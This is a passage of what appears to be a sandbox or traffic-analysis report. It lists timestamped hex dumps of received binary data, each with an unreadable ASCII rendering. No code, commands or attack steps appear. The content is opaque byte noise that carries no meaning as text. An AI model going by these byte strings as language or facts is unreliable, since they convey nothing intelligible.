cd b6 e9 81 8a 7a b0 66 9b 68 4c e6 9f 57 56 39 0f 09 9c 7f c9 a1 c6 81 9b f9 78 8e 62 50 3f 67 fb fe e4 4b 10 37 b7 6f b4 c9 b9 84
                                                          Data Ascii: KZ{F5w1?fR1mDpC;)yNuHRxFK__QbJCKq11VR[_Yyb\+!HoR&^#953[m341F/dn{svX%M4xy\E$('_OzqLHDA%zfhLWV9xbP?gK7o
                                                          2023-08-02 08:16:22 UTC2271INData Raw: c2 94 c4 4a b3 2c f0 0c 17 82 db ac cb 51 56 d5 28 98 60 0e d2 3e 15 4a d0 2f 5e 78 69 62 32 7b 76 8c 60 dd de 73 e6 ff 4f b1 08 4f cf 12 1a d1 19 2f aa 5a 58 d7 e2 3e df 1b c2 8f 80 a4 6a ce 89 0d 48 ed c8 5b 6b 1a c6 e1 fe 00 29 81 f4 d4 0e 8d e1 da 43 0f 34 94 71 8f 84 96 dc 32 ba f2 63 37 2d 88 1c 36 61 41 2b 3d 34 24 61 fe 08 6f 23 fc 32 8e d8 b6 e2 62 f2 7b 96 2e 9c 07 0a e9 1e 7a 9a 5b ba 31 23 65 cf 87 8b e2 fd b9 b6 7e c4 a8 9d 1c d5 58 3f 37 10 3a 9d e6 f4 3a 06 f4 4b d1 79 8c 01 ca fa 7a 0c 95 a8 64 e9 d5 6d f5 86 98 76 3c a4 71 1b 38 87 8a b5 16 6d 7c 22 2a 5e 18 9b 8f 9c ee 9c 4a 07 12 5a c5 8a 96 3e ff a5 f9 63 ee 4d 00 8e 45 fa 86 e5 27 f3 a1 87 7e 97 04 13 02 50 d8 c2 31 12 d0 a1 c4 53 93 42 5c 6c 7f 3a 39 63 f5 8c 2e 32 e0 a4 4d 4a 14 e5
                                                          Data Ascii: J,QV(`>J/^xib2{v`sOO/ZX>jH[k)C4q2c7-6aA+=4$ao#2b{.z[1#e~X?7::Kyzdmv<q8m|"*^JZ>cME'~P1SB\l:9c.2MJ
                                                          2023-08-02 08:16:22 UTC2287INData Raw: b1 12 9f 10 7a 2b 8a b1 53 69 70 40 85 5a 73 de 6a 2a 90 45 a8 4e 6b ad 90 58 cd d0 b2 2d 87 db c3 44 92 8d 6c ce 99 e6 11 5e 69 7c b1 b9 4f cc fb a9 77 9f ab d5 9d 46 bf e8 5d 6a fd 37 cd 92 7b ca 47 e6 b6 6c e8 9f af 13 91 66 ea 91 67 2c 33 83 25 9f 01 bb 16 e9 87 8e 02 98 94 64 a7 be 4e e7 79 50 a1 0f 23 a4 08 a8 78 5a cd 76 3a 8d 8e ad 99 a3 de 83 23 dc f0 4a c1 c5 03 64 47 b2 0f 8c 00 3b be 64 a1 b3 e7 11 0d 49 36 22 3b e1 10 3a 8d ef 8b 67 e1 62 91 9e e9 59 37 78 94 6f 78 c3 3f be 40 39 fa 32 d2 b1 8f 64 3a 39 16 2b da 5d fb 08 eb 80 02 64 2d d0 c0 ea eb 2b 4c 2c 2a f5 6a a7 c0 3e 79 63 20 5d 7a 63 88 45 0c f4 90 fb 43 48 84 bc ec fd 07 7b 35 8f 33 d8 48 ef af b2 2b f1 dd a2 da 3a fb 3e 37 89 f3 be b9 cd 79 a9 e4 db d6 8c 32 d3 04 58 08 62 d1 f9 0e
                                                          Data Ascii: z+Sip@Zsj*ENkX-Dl^i|OwF]j7{Glfg,3%dNyP#xZv:#JdG;dI6";:gbY7xox?@92d:9+]d-+L,*j>yc ]zcECH{53H+:>7y2Xb
                                                          2023-08-02 08:16:22 UTC2303INData Raw: 6f 0b af 74 64 ab 28 ca bd 35 30 55 7b 7d 6c c9 56 35 73 ba 11 5b 34 2a ff 6d 0b 30 d9 3a 83 fc fd f1 d8 fe 13 4d 97 87 c4 82 4d 84 68 05 1b b0 66 96 ca b7 d8 62 b8 3a c4 9c f3 fa 0d 50 a8 3e 19 b0 4d 7f 59 c0 5e 8d 4e 49 3e 98 5b fe 97 ca 40 09 44 4c 17 c3 dc 44 22 f1 2e 1a 21 cb 87 24 af c8 ab 5e 5f ff 05 3c 40 56 b0 9c 37 a3 33 df 4a d2 e9 09 db 7b 0c cc ee 5d e4 1f 3e dd 43 d4 a0 38 99 d6 20 5a 26 8c e1 f4 b5 9e 77 e1 fd 1a 4c 3a 67 b4 cc ce c8 86 bb 18 2a ae e8 f4 c8 40 a0 e8 45 ad 47 3c 91 98 68 16 7a ad 39 6b a9 0a 83 57 bc a3 47 51 c8 af e3 d3 48 b1 2b d0 1f 93 9e 53 8f df fb 68 f3 60 5a 7d a4 dc 99 1e ed 34 35 c9 aa b4 da 0d 6f 8c 41 3d 86 fb 09 75 a9 c2 69 ab ea 37 61 bc 75 bb 37 e8 86 f5 29 9d 21 1e 7c 5d ea 7d 54 db ab ad f1 54 8e dc 2d 29 99
                                                          Data Ascii: otd(50U{}lV5s[4*m0:MMhfb:P>MY^NI>[@DLD".!$^_<@V73J{]>C8 Z&wL:g*@EG<hz9kWGQH+Sh`Z}45oA=ui7au7)!|]}TT-)
                                                          2023-08-02 08:16:22 UTC2319INData Raw: 30 d5 4d 61 58 8f bd 92 56 c3 53 96 5a 11 ef 06 bb 68 7d 0e 9d f8 1c 06 c8 60 df 15 fb 0b d6 32 3a 03 1e 3a 3a ae 92 c7 99 c7 d9 38 56 7d 81 7e a8 86 ce f4 9c 35 7d 5e cc 56 9e 7c 39 da a6 74 b6 90 68 d1 3c aa 89 40 4e de 7c b3 b9 4e 3c 79 4a a6 b1 1a c2 eb ca 6d 8a 17 ad 15 25 26 6d c6 38 49 64 13 7e 57 f3 04 90 b7 5f af c4 ff 3c da cc c5 cb b9 0e 63 83 cd 5d a8 d1 49 e4 10 4c c4 17 cf 2e 11 ef 5d f2 7b 09 95 8e 9c 5c ca 67 5d bf 9c ed 91 1f 5f 8a af 88 67 9c 77 8b 7d b1 f6 a7 8d 57 31 50 d0 8f 27 9f b1 dc a9 89 8b fe 9a a0 0b b8 35 ed 8f 34 6c 43 2f 3f 7b d2 68 16 af 81 80 f0 f7 cd 99 6e b7 37 f6 fb 65 f9 62 c9 07 6f b3 11 64 01 00 a7 63 be ce 28 02 73 aa 74 95 79 a7 80 f6 b7 b4 73 df 2b 38 0b 9b af 3c e9 64 7a ca d5 ae de f0 fe f5 e2 38 77 87 4b d3 f8
                                                          Data Ascii: 0MaXVSZh}`2:::8V}~5}^V|9th<@N|N<yJm%&m8Id~W_<c]IL.]{\g]_gw}W1P'54lC/?{hn7ebodc(stys+8<dz8wK
                                                          2023-08-02 08:16:22 UTC2335INData Raw: 17 ac 97 f8 2a 26 09 bb 3d c1 6b 3e 8b 2d ed 85 36 23 b2 d2 7f 8f 7c de f1 96 18 79 ba d4 1e 7b 77 0d 09 f3 0f b3 29 a7 7b 61 c3 14 7f 15 53 21 ac 1f 06 12 c0 8e 07 a8 7f 9f 3b 67 86 aa 00 3d d1 d4 24 37 8a 88 f9 bb 1d 48 e7 de d0 b6 80 4e 51 1b 1d 3d b3 6a 53 a1 da 04 4a 60 90 f8 99 54 5d 30 40 35 63 34 3e 77 fd d8 ff 3d a8 fc 67 27 c8 34 3d 9d 08 fe 49 bd e8 fe 3f 61 1e f5 57 8b b8 18 57 60 99 b3 2d 48 3e 9e d4 b7 66 3a 42 48 89 3d eb 2f 56 00 00 2e 94 44 ea 44 c0 fc 4a d0 01 0a 27 93 8f 6b b6 47 44 41 23 10 c4 21 13 09 01 a7 ab e1 20 3e 3f 68 78 77 4f d8 35 73 d8 f8 c8 18 81 e1 c8 25 0a 88 51 2a 89 e1 69 9a 1d f9 91 1b a4 df 61 e5 a0 cb 6e b2 7a 4d 9c 3d 5a d4 cb 8f 7a 8e 94 41 10 4e ae c1 30 86 e1 3c c3 ba 81 20 e1 13 2e 27 6c 13 ad 2d 41 f6 3c bb d6
                                                          Data Ascii: *&=k>-6#|y{w){aS!;g=$7HNQ=jSJ`T]0@5c4>w=g'4=I?aWW`-H>f:BH=/V.DDJ'kGDA#! >?hxwO5s%Q*ianzM=ZzAN0< .'l-A<
                                                          2023-08-02 08:16:22 UTC2351INData Raw: 32 31 84 3b e8 af 66 53 9a c7 b9 5e bc 4a e7 fe 22 a8 ce 3c 6a 87 e6 7e d0 3c b0 55 c1 d3 7b 29 c3 36 9a 95 f2 a3 36 ab b7 1f 5c 4a 2b 65 3f a6 62 65 b0 a2 f0 fd a5 b3 0b 8e 76 3d 94 9e 3a 18 d8 5f eb 87 b6 b3 fd 89 ea d6 11 38 61 03 1a 8e 16 18 12 c9 a4 ae 8f 1a 98 b0 d4 9f 44 ff 77 5e e9 9f 51 9c 09 e4 f9 ba 56 0e 37 1f ca 3e ab a6 ae e2 9b 0c 1f 73 99 12 2a e3 65 12 e7 76 39 7b 0d 5c ef 13 8f 25 0b 8a 0e eb dc d5 86 7a 58 76 77 94 4a 52 5e c9 93 83 14 3a 05 61 b7 51 9e 94 21 5b 67 66 0e 20 d2 fd df 07 b2 1f 19 29 8e 03 df d6 08 c2 0f 33 6c 5d 3b 57 37 ce 7f 2e 36 99 7d 82 f2 e3 5a 81 0d 64 a2 92 71 e6 e9 95 fa 21 ca dd cf 94 ec 2e 62 b0 fe 5e fb 02 7b 09 f0 08 0a 63 20 7d 1f 86 f2 fe 04 03 e0 88 e1 62 07 c0 d1 b2 0f f2 fe 13 73 7a 03 71 5f cb 81 f6 88
                                                          Data Ascii: 21;fS^J"<j~<U{)66\J+e?bev=:_8aDw^QV7>s*ev9{\%zXvwJR^:aQ![gf )3l];W7.6}Zdq!.b^{c }bszq_
                                                          2023-08-02 08:16:22 UTC2367INData Raw: 36 2b 4c b7 6c 31 ac c3 ed 9a 2c 6e fb fe ad 48 ac 39 9a 7b b7 e6 01 c4 ee 74 c5 6d 58 0f e4 a2 63 a4 f8 40 d7 5e 03 05 98 bd 82 47 27 d0 d4 71 9d e5 07 9f 20 c2 41 b3 3a 92 8a 6e 55 18 18 6a d4 68 ef f7 4f 88 89 7b 5e 39 e7 eb d9 e7 9a fa fb 0d 81 3f 36 b9 2b 50 77 ea 3b 35 75 b2 87 cf 99 a9 b8 dc d7 75 8d c2 6f da db d2 3d 7c 27 b5 b3 e7 f0 42 ad cb 06 d3 27 d8 f1 00 e8 e8 57 29 65 a2 5e 58 6a 0f 22 10 99 7c e8 b1 ca f0 78 d6 1d 44 5a 21 a9 ab 7e 2a 34 33 fc 64 d2 5a 04 63 45 51 30 18 0a 12 22 b6 33 fd 7e d6 75 2c 72 de e8 5d fb 2c 7c b4 81 71 1c 66 bc 27 19 1c 77 d1 69 63 22 c8 27 e8 8d fe 3f 9c 84 5c f0 dc ef 10 bc ae 34 b5 18 f0 05 1b ee 8e 58 53 be b2 99 b3 01 fe b1 d2 a1 75 05 98 01 4a 0a 17 54 9e f5 6d 52 fb 45 44 e2 ec a9 f9 45 a0 f4 57 fa e7 5c
                                                          Data Ascii: 6+Ll1,nH9{tmXc@^G'q A:nUjhO{^9?6+Pw;5uuo=|'B'W)e^Xj"|xDZ!~*43dZcEQ0"3~u,r],|qf'wic"'?\4XSuJTmREDEW\
                                                          2023-08-02 08:16:22 UTC2383INData Raw: 17 2e ff 00 0f 8f ff a8 0f d1 17 84 9d b9 71 f5 a9 4d 63 bc 8f bb 9d 0e 40 11 5e 56 52 bf 6f cd 1e cf 9a 6b fc c8 1f 4b f3 97 47 74 5b 68 4a 29 03 cc c2 14 2b f5 5a d6 e1 88 f3 a9 ab e9 69 ca 0d 44 ec 53 75 5d e8 e2 a1 b6 4f 04 ad 65 f3 36 1a 4d 97 0c a1 0d 6d e2 73 a1 0a f3 5a 32 b5 b8 c7 be d7 44 ae 2d 85 f3 0a d8 c0 92 23 31 29 21 62 a5 be 76 e5 8e 3c e7 a3 d8 69 d3 13 39 77 2d d8 f0 23 a4 e1 3a 7b 4c e3 f5 62 b2 e5 51 3e 63 01 c0 09 a8 14 b1 e0 88 54 f4 28 22 b8 7f 2e a3 32 9d 89 76 e9 55 06 41 25 c8 a9 33 1f 03 9d 12 26 bc 52 2c 60 ac 54 28 dd c5 8d cd f4 d8 d0 53 8e 58 9b d9 fd d0 45 2f 0e 95 51 f9 ac 5c 95 e3 75 44 c5 58 ef 0c bd 99 21 c6 ca 0b 94 48 07 86 21 f1 ad 34 34 46 8f d7 fa 27 b7 b6 e2 33 5d d1 18 52 b9 4f 36 ec 29 26 b6 52 74 8e be f6 95
                                                          Data Ascii: .qMc@^VRokKGt[hJ)+ZiDSu]Oe6MmsZ2D-#1)!bv<i9w-#:{LbQ>cT(".2vUA%3&R,`T(SXE/Q\uDX!H!44F'3]RO6)&Rt
                                                          2023-08-02 08:16:22 UTC2399INData Raw: ae 36 55 af e7 fc da 25 f2 4b 4a ef 4e b9 ea 90 25 cf 25 b6 5e 16 bd 80 4a 8f 6b 2e 03 cf d8 1d a3 22 e2 cb 0f eb 5b 7b c0 ca 04 e0 bd 88 a4 d9 d6 44 1d 26 2c 44 85 13 3a 50 73 84 52 30 12 64 db c5 1c 92 a8 bc b3 58 f3 3c f3 6d 54 b5 c4 fc 49 cb 03 48 80 70 a9 42 7c ed 70 48 57 df 9f 83 81 f5 41 f2 10 aa 44 2e c5 d2 b1 22 78 50 cb ce 8f e8 d0 1d cb f5 5f 6f 38 88 d5 50 0f 00 80 d9 99 f3 a7 6c c2 ae f9 74 2b a7 50 6b 48 1e d5 70 8a da 75 9c ea fc 9b 66 2a 83 14 4b cc 24 7b b4 62 e0 b9 10 1e 80 5e d2 03 28 ef c6 93 e2 a4 61 39 1b c4 26 30 53 da 20 50 9e 81 11 d6 3c 1e 47 45 35 e5 c9 80 6e 36 00 c6 7c c8 7f 6c 98 16 79 5d 09 ff 29 5d 83 45 b7 40 95 ca e2 5e 07 ef 5d f4 a2 16 75 40 6c aa c9 ec 0e a7 27 d5 21 7b 7c 08 58 8e c8 f9 60 01 d5 be 9f 58 1f 37 89 19
                                                          Data Ascii: 6U%KJN%%^Jk."[{D&,D:PsR0dX<mTIHpB|pHWAD."xP_o8Plt+PkHpuf*K${b^(a9&0S P<GE5n6|ly])]E@^]u@l'!{|X`X7
                                                          2023-08-02 08:16:22 UTC2415INData Raw: 85 81 95 55 c3 bf cd 2e e5 3f f6 89 7b 1a 92 29 31 7d 1a f7 d7 84 2a b5 18 1b 1a de 0e 01 be 2c 5c 72 25 3f b7 7d e7 c6 b8 f1 68 54 cb eb 7f fe 48 00 50 c7 2c a4 69 60 f2 4b d7 66 18 ef 7d c0 23 73 0a bb dd 22 5f 14 05 9d fc 65 ca 92 22 bd 94 42 21 ec a9 44 a2 20 c8 77 ed a2 c6 55 bf 10 0d eb 6a 77 fc 0e 28 27 74 9c 66 83 82 7b 9d 3d a7 1c b5 8a f2 3a b1 57 b9 9a 9a d7 cc 80 eb f4 63 f4 88 c1 fd 14 a1 c6 37 db 3d fb 36 ee b0 5c 4a 2b 65 bf cb 64 90 33 b2 1a 6c 9e c9 0a 5b fd 97 da 46 57 ff 71 cc c3 c6 ba bd 84 c2 6e 5b a6 8a 08 3e 8b 37 25 ed 1a d3 f8 f1 a9 52 44 56 f5 60 74 1e 4f fb 58 92 c2 33 c3 85 bf 07 42 9f 34 b9 f0 78 ff da a9 2c 52 32 ce 23 6f a6 3a d8 78 51 4a 01 28 23 84 c0 63 f6 48 79 d0 34 ac d9 19 a9 68 04 88 a9 eb 81 5b c2 da 7e 5e b5 5a 30
                                                          Data Ascii: U.?{)1}*,\r%?}hTHP,i`Kf}#s"_e"B!D wUjw('tf{=:Wc7=6\J+ed3l[FWqn[>7%RDV`tOX3B4x,R2#o:xQJ(#cHy4h[~^Z0
                                                          2023-08-02 08:16:22 UTC2431INData Raw: 36 cf c5 4a 85 d4 ad 35 80 ae 0e 35 15 43 78 bf b2 22 5d 20 61 d0 f9 38 82 d6 f3 94 40 17 86 a4 99 e5 01 18 61 81 62 bf 12 2b 0d 64 7b ba f6 98 81 f0 29 f7 b6 8b 95 5f 5a 49 1e 5e d7 6b 8e 1d 66 d0 28 3f ae 54 f2 f5 f3 9f d9 2f 41 72 0f 82 8f 15 ca 4b 0a d2 93 63 71 2b 0d c1 fb 63 5c 66 72 08 88 e1 63 4d 3d bb 28 36 0c a9 72 52 89 96 64 d6 a5 4c 4a 9b 48 ca e2 5b 08 9a 8c c8 29 cb 12 17 24 1a 89 5b a5 fd 5f 21 1a 54 70 bc 15 e4 5f 36 c0 56 f9 76 4e ee ad f0 14 87 20 87 b5 0d 3e b7 f8 68 6a 44 ce 3e d6 13 f5 d5 b5 14 4d 9d dd 19 10 d9 02 71 77 2d ca 5e 1d 8e d3 89 b9 8f 6a 26 d9 32 0b 5b e0 5f 32 f9 a8 43 c5 cd 61 f7 05 4e f8 24 46 7a 90 7f 33 0d 5f da 99 5f e2 3d 43 fc bb db 80 23 b4 fc e6 c7 cd b3 72 ed e9 08 fa 4d 4e 34 e9 13 2b 37 8e 86 08 60 7e 23 7e
                                                          Data Ascii: 6J55Cx"] a8@ab+d{)_ZI^kf(?T/ArKcq+c\frcM=(6rRdLJH[)$[_!Tp_6VvN >hjD>Mqw-^j&2[_2CaN$Fz3__=C#rMN4+7`~#~
                                                          2023-08-02 08:16:22 UTC2447INData Raw: 26 71 7e 2d 79 de af 8b 2d 02 5a 5e dd 6f 54 72 0d ff c9 75 ed 23 33 02 df 36 2a c6 bb 8a 6a e2 b3 69 d5 bb a1 39 d8 d7 18 ba 42 ee 98 d3 be 3b 24 2f ca f8 c0 07 50 08 f8 2f 81 ad 06 af 67 e4 42 80 52 97 31 44 03 d7 08 21 5c 4e 7e c8 eb 64 07 e2 7b 72 0c a0 17 49 4e 9f 9d 7f 7a ad a1 ea 7e ea fb 0f 5c 45 da ff af b3 bb 2a ec 20 1f 7f 1d e7 80 fd 40 2c 5d 46 0f 4a 76 8b 35 3d b7 d5 51 bd e2 3a 4a fb 43 52 b8 0c 14 18 72 4e 0c 06 26 1f 1d 84 ec 4c 58 4a 4c f6 15 58 c1 95 cf a8 29 bd dc 2f 30 39 f0 93 5f 40 80 79 8d b8 14 45 23 c7 43 a8 35 3f ea db 6a 59 a6 72 d7 5d 65 85 b0 05 e3 7f 33 c9 6a a0 c3 a5 c1 f1 24 43 de b6 61 9d 87 e4 34 a4 d0 22 1d 5e 5e a9 9a 5e 7d 36 d9 dc 7f 77 22 6f 10 95 fa d8 90 5b e9 f0 3e 72 65 47 95 5b dc f7 f1 32 63 8f 70 8c 8c 30 2d
                                                          Data Ascii: &q~-y-Z^oTru#36*ji9B;$/P/gBR1D!\N~d{rINz~\E* @,]FJv5=Q:JCRrN&LXJLX)/09_@yE#C5?jYr]e3j$Ca4"^^^}6w"o[>reG[2cp0-
                                                          2023-08-02 08:16:22 UTC2463INData Raw: 13 71 5e 02 dc 6d 0b e6 97 42 3b ca d0 c6 f3 28 a8 77 7e 64 5c e5 da 3b 82 58 3d 52 37 cf 50 f0 5d 0b 2f b9 4e ef 01 40 ea 78 be 27 32 0b 41 32 b8 54 bf 36 7e 01 ed ef f9 06 22 d7 9e 4a a9 14 27 01 a4 dc 5c 53 bb 36 ff e3 ae 39 96 b1 99 b8 17 1f 4d 6e d5 8e 99 3b 30 74 8e 5d 40 1b 25 f4 1b 3c c1 b9 9b 49 39 00 0a 2b 34 a9 f5 be f2 71 ee 6f e1 15 b8 8e d9 ed c4 7f 58 53 f9 f7 bf 97 5c c8 e7 07 54 57 94 62 f7 54 87 bb 5a 33 3d 83 ce cb e4 b2 a3 42 11 03 70 52 69 dd 94 cb 0f fe 46 4e 4c cb 20 2e 38 e4 19 63 c5 b0 88 62 ec 47 d1 50 e2 ee 55 7d 46 74 c0 f9 00 62 0d e5 92 e2 81 5e f3 5a 5b b4 23 ad 67 f9 5e ce 35 74 62 b4 62 17 a4 27 95 06 b4 b8 e1 c9 41 3c f5 f4 29 1d 26 88 0f 96 52 d7 5c 5f 08 16 2f 93 f3 d9 6a 18 84 d8 6d 46 75 f7 bc dc 7b 50 6f d0 f6 2b ea
                                                          Data Ascii: q^mB;(w~d\;X=R7P]/N@x'2A2T6~"J'\S69Mn;0t]@%<I9+4qoXS\TWbTZ3=BpRiFNL .8cbGPU}Ftb^Z[#g^5tbb'A<)&R\_/jmFu{Po+
                                                          2023-08-02 08:16:22 UTC2479INData Raw: d5 2c c4 2e 4c 29 83 e8 e5 2f 59 50 77 d4 07 05 c1 fd fb 3f 92 18 5d 46 bc 96 da 79 6c 9a 6e 18 da 7e d2 38 00 02 d1 23 07 d1 5b af 25 71 ad 4b 10 0a 75 00 79 bb 20 6b 70 1d 3f 1a 6f a8 81 2f 67 a9 8b 45 a8 3b f6 c6 dd ff a9 40 3e ca 2b cb 50 c7 99 45 4c a7 64 4f 2a bd 46 c0 c4 fe c5 df c2 d0 bf df 7f 90 87 bc be e5 6f ab ba aa 7b 00 77 3b 50 95 35 ce d3 80 b3 af ae 48 48 51 19 44 09 3e d8 14 38 f0 b3 86 f0 72 d5 68 d9 38 2d b5 3d 4d 2a d4 6b b7 96 24 a5 d9 7e 2f ea 94 2d c5 cf f6 3a b7 e4 5f 85 7b a4 3d 00 ca e9 08 79 4e 74 44 bc c3 63 3d 75 a5 b9 22 db 30 66 00 13 01 da 8b 93 78 24 9e 1a 41 57 10 22 27 a6 02 d3 81 32 a8 86 f2 e8 d6 ef 19 61 f9 67 57 93 a8 0d 4d bd bb 9d 24 4d 98 6a 21 e9 22 0c 6f 1e 84 b2 d3 e3 59 02 09 8b 71 7e db 4f 2c 62 5b 2b aa bd
                                                          Data Ascii: ,.L)/YPw?]Fyln~8#[%qKuy kp?o/gE;@>+PELdO*Fo{w;P5HHQD>8rh8-=M*k$~/-:_{=yNtDc=u"0fx$AW"'2agWM$Mj!"oYq~O,b[+
                                                          2023-08-02 08:16:22 UTC2495INData Raw: 59 a0 b3 e6 9c e0 37 11 33 b9 bf 9f 8b 42 aa cc 8b ba 4c 9f d2 68 84 a6 e2 e0 72 a7 e4 1a c4 e9 e6 c2 16 4e 33 3f a2 37 0f 6b a7 81 d6 56 fe 16 8f d8 5f 13 f0 1e a1 7d 78 43 a2 18 61 11 ec 53 88 63 c2 66 da 25 6c 00 50 bc 96 ad 5d 13 f9 72 39 28 8b 46 8d b2 ba 06 a4 e6 fa 74 9d 3f 65 35 e8 d7 ec 0d 92 02 0c 20 4a 95 26 a2 85 94 4f f5 20 d7 1c 77 e2 69 84 e2 0c d1 c4 8d 04 0d f1 a0 ab 24 d7 51 e6 2a b3 9e a8 02 4e a0 b5 2a 22 5f 36 b3 1a e2 25 68 31 3a 61 68 6c bd 1f c0 74 18 27 41 18 24 cd 17 fc bb b9 5a e8 ed b4 69 26 34 38 a9 72 5d 39 d1 b3 f4 e4 80 4a 39 0c e8 4d 83 93 95 19 4f da f5 92 68 ea e8 2f 19 ae 6d 91 02 40 2a ae fc 8a ee a4 72 c5 8c 76 02 ab 58 f2 a4 67 37 6c 01 6e 31 d0 f7 e8 43 9d e1 a2 53 96 78 93 f3 38 02 bd f0 2b 5f fe 7f 42 21 98 71 8c
                                                          Data Ascii: Y73BLhrN3?7kV_}xCaScf%lP]r9(Ft?e5 J&O wi$Q*N*"_6%h1:ahlt'A$Zi&48r]9J9MOh/m@*rvXg7ln1CSx8+_B!q
                                                          2023-08-02 08:16:22 UTC2511INData Raw: 09 4f b8 85 d6 3d 26 47 2f 0e ff f4 07 13 af 1c 94 28 af 31 98 d6 b5 1a 98 7a 20 96 3e ab 0e 25 52 6a 50 c4 e4 db f0 55 ce 02 12 58 12 4e 72 24 6e c0 af e4 d1 21 a8 44 9a 4e b8 f7 b1 c9 a1 d1 15 67 f8 5e fc cd 9c d3 ff 30 a3 fd b7 02 d6 6a 76 38 30 45 ac b5 0f 82 50 37 50 61 b8 db a0 34 bf 04 93 cb ac e8 22 c4 12 8a c4 14 7f f6 20 2a d3 fc 55 40 d1 c0 ec 8e 85 c3 2a 16 53 d0 31 a1 47 5d 04 c7 cf b9 84 96 54 dd b0 0b ab ee 8e 6d 4b 1c a3 3e 8d 59 bd 8c ad a6 52 89 01 c7 ef ff 30 97 be c2 9f fe c9 04 34 5b 53 4c e0 40 68 cb 91 36 77 d6 84 67 79 56 74 45 71 3a b3 b7 18 d1 ae f8 31 74 8b a9 a2 a9 30 44 a3 be 40 c8 50 b7 99 02 d6 23 93 20 49 20 18 ee 9a 85 0c 6f 97 41 ec 90 d2 bd d1 f0 3b f6 7f 7a 25 50 12 f4 e3 3d e8 d2 e9 01 8a 42 25 06 f1 8a 98 9d bb 5a 10
                                                          Data Ascii: O=&G/(1z >%RjPUXNr$n!DNg^0jv80EP7Pa4" *U@*S1G]TmK>YR04[SL@h6wgyVtEq:1t0D@P# I oA;z%P=B%Z
                                                          2023-08-02 08:16:22 UTC2527INData Raw: 67 88 65 d2 2f 8e f8 b1 a8 0d 13 6b 81 0a 5c 30 17 ce 4a 7a f7 b1 7c 6d 92 89 3a 82 f8 14 af 5a 42 34 86 bf 43 80 79 5d e3 61 96 f2 e8 62 de c1 4a 9b 1f 49 7b 7a 61 75 d7 56 98 a5 44 d9 2d 02 97 bb 37 78 8b 10 6f 21 0f e7 d3 e0 73 f1 39 80 72 f7 92 16 55 04 31 04 99 a9 73 4a 9d 6f db 36 c7 0a 48 2d c1 dd 3b cb 06 9a b0 70 a9 e5 17 28 2c 13 ca 89 bb 9a 74 b9 e5 3e da 6f ba 6f e5 27 60 b4 d1 bf ad 78 4b ce b2 13 87 a2 69 4c 39 4d 04 4d fe a4 4e a1 35 c3 81 3f b8 ae b0 a2 64 9e 56 f4 84 a2 58 e7 d4 ee 21 18 fd 76 05 ee 61 ba aa 17 c0 f2 ba 10 00 c3 dd 49 8d 9c 6c 2c f4 f8 46 08 cb 13 f8 37 8c 25 30 af 7f 44 9b 5a ef d3 b8 9e 00 87 e4 b3 19 2a 69 0a 1a 8b 57 01 50 68 88 4a c0 40 3e 96 10 60 07 96 7b 85 9c ce a1 49 d3 dc 37 ee be 3c c8 cf 9c 68 86 ae d1 c9 5b
                                                          Data Ascii: ge/k\0Jz|m:ZB4Cy]abJI{zauVD-7xo!s9rU1sJo6H-;p(,t>oo'`xKiL9MMN5?dVX!vaIl,F7%0DZ*iWPhJ@>`{I7<h[
                                                          2023-08-02 08:16:22 UTC2543INData Raw: 85 5e cc 77 c0 21 de af 7d 33 52 ee ed c1 01 20 88 ad 46 7e 7d bf cd 0a 70 98 76 60 f9 6b 6e 29 27 8f 8b ed 8d 9e 28 8f 3f ff b5 9f 0f 5d c8 e6 d1 1e 03 fd 30 84 fd 28 ac f0 53 74 f2 ee e7 c1 98 08 f9 d6 93 9c 16 90 38 f7 f2 9b 20 48 cc 34 e0 5e db 6b bd c7 ae ef 2e b0 de 7c 34 51 25 ff 5e 09 29 b2 79 35 04 8c 57 99 51 b3 3c aa 05 46 e5 8b 83 5a 3d 41 aa 61 95 28 e2 30 69 6c 19 f1 c2 1d 3c cc 1f 1b 93 af 48 e8 ee eb 37 3f e6 86 be 55 f8 57 cf ce 23 34 22 97 d3 7f 4c 36 14 a6 bb ce 76 03 1b 0d 3d d2 36 31 92 97 c0 a3 24 e0 48 8d 43 d1 c9 65 ce aa 50 84 eb 3a f8 2a d5 f4 d3 bd f9 94 96 01 1c 10 39 a1 b9 8a 22 a1 af 29 9a df 7a 20 bc 17 71 d2 ec 25 52 74 ab 16 65 3d bb 52 4d 2e c3 71 e1 72 ad aa b4 38 bf d5 ce c4 65 23 65 9b 29 ce 7e cb 37 69 ce 75 17 a7 f1
                                                          Data Ascii: ^w!}3R F~}pv`kn)'(?]0(St8 H4^k.|4Q%^)y5WQ<FZ=Aa(0il<H7?UW#4"L6v=61$HCeP:*9")z q%Rte=RM.qr8e#e)~7iu
                                                          2023-08-02 08:16:22 UTC2559INData Raw: 10 a2 85 69 b1 e3 3d b8 28 b3 50 eb b7 d6 72 44 e3 df c2 05 7b 8c e5 bc de 05 2f 24 39 1c 6d 42 84 e0 5e 23 b4 b7 e3 30 7f dd 90 7f 4d 7b 4c 7f ed a9 3a 84 0c 81 29 5e 53 3f d9 a7 54 23 e9 e4 73 18 86 6c 3f 81 47 39 da ea 7b 0b e9 f7 ba e9 d2 b9 00 dd 6e b0 f0 f8 25 87 1b 08 f7 f4 c2 a9 19 2e 95 3d e7 6b 80 71 97 bb 70 c2 26 8a 82 40 19 f1 ed 3d 78 d1 8a 5c 6d ff cb 09 4b 10 2b e9 ce 0a 95 f0 a7 96 47 88 2f 36 e8 af 1a b3 9c f8 87 88 b8 5c 60 cb 19 b0 95 67 79 f9 d7 f7 5a 2a 85 9e 09 f0 69 7d 28 9b d3 bc 5c be 1c 01 c2 86 e1 98 88 ac bd 7b 62 c9 99 76 df 07 d7 6e de b1 62 d2 95 1f ad 3b 2e 04 c2 30 98 ba 93 09 79 76 14 e7 14 e4 c3 40 3d b7 fd 98 b1 3d e8 11 02 1f a2 d3 6e 0b 77 53 17 2e 2c 25 16 dc 12 27 2b af 14 9e a5 4d f9 ec a9 f9 02 c3 a7 d3 a5 d9 54
                                                          Data Ascii: i=(PrD{/$9mB^#0M{L:)^S?T#sl?G9{n%.=kqp&@=x\mK+G/6\`gyZ*i}(\{bvnb;.0yv@==nwS.,%'+MT
